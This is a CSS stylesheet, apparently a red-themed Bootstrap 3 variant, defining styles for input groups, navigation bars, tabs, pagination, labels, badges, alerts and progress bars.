.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group-addon:first-child {
  border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.input-group-addon:last-child {
  border-left: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  z-index: 2;
  margin-left: -1px;
}
.nav {
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #cc0000;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: left;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-right: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0 0 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  cursor: default;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-right: 0;
  border-radius: 0;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: left;
}
.nav-pills > li > a {
  border-radius: 0;
}
.nav-pills > li + li {
  margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #cc0000;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-left: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-right: 0;
  border-radius: 0;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: left;
  }
}
.navbar-collapse {
  padding-right: 20px;
  padding-left: 20px;
  overflow-x: visible;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-right: 0;
    padding-left: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  right: 0;
  left: 0;
  z-index: 1030;
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-right: -20px;
  margin-left: -20px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-right: 0;
    margin-left: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-brand {
  float: left;
  height: 55px;
  padding: 17.5px 20px;
  font-size: 18px;
  line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-left: -20px;
  }
}
.navbar-toggle {
  position: relative;
  float: right;
  padding: 9px 10px;
  margin-right: 20px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 15px 5px 25px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: left;
    margin: 0;
  }
  .navbar-nav > li {
    float: left;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  padding: 10px 20px;
  margin-right: -20px;
  margin-left: -20px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-left: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    padding-top: 0;
    padding-bottom: 0;
    margin-right: 0;
    margin-left: 0;
    border: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: left;
    margin-right: 20px;
    margin-left: 20px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: left !important;
  }
  .navbar-right {
    float: right !important;
    margin-right: -20px;
  }
  .navbar-right ~ .navbar-right {
    margin-right: 0;
  }
}
.navbar-default {
  background-color: #cc0000;
  border-color: #b30000;
}
.navbar-default .navbar-brand {
  color: #ffcccc;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #ff9999;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #ffcccc;
}
.navbar-default .navbar-nav > li > a {
  color: #ffcccc;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #ffcccc;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-toggle {
  border-color: #cc0000;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #cc0000;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #b30000;
}
.navbar-default .navbar-link {
  color: #ffcccc;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #ffcccc;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: #080808;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  padding: 0 5px;
  color: #999999;
  content: "/\00a0";
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-left: 0;
  margin: 20px 0;
  border-radius: 0;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: left;
  padding: 6px 12px;
  margin-left: -1px;
  line-height: 1.42857143;
  color: #cc0000;
  text-decoration: none;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  z-index: 2;
  color: #800000;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 3;
  color: #ffffff;
  cursor: default;
  background-color: #cc0000;
  border-color: #cc0000;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
  border-color: #dddddd;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pager {
  padding-left: 0;
  margin: 20px 0;
  text-align: center;
  list-style: none;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: right;
}
.pager .previous > a,
.pager .previous > span {
  float: left;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: 700;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #cc0000;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #990000;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  background-color: #999999;
  border-radius: 0;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
.nav-pills > li > a > .badge {
  margin-left: 3px;
}
.jumbotron {
  padding-top: 40px;
  padding-bottom: 40px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  padding-right: 20px;
  padding-left: 20px;
  border-radius: 0;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding-top: 64px;
    padding-bottom: 64px;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-right: 80px;
    padding-left: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-right: auto;
  margin-left: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #cc0000;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-right: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  right: -21px;
  color: inherit;
}
.alert-success {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
.progress {
  height: 20px;
  margin-bottom: 20px;
  overflow: hidden;
  background-color: #f5f5f5;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: left;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #cc0000;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  overflow: hidden;
  zoom: 1;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
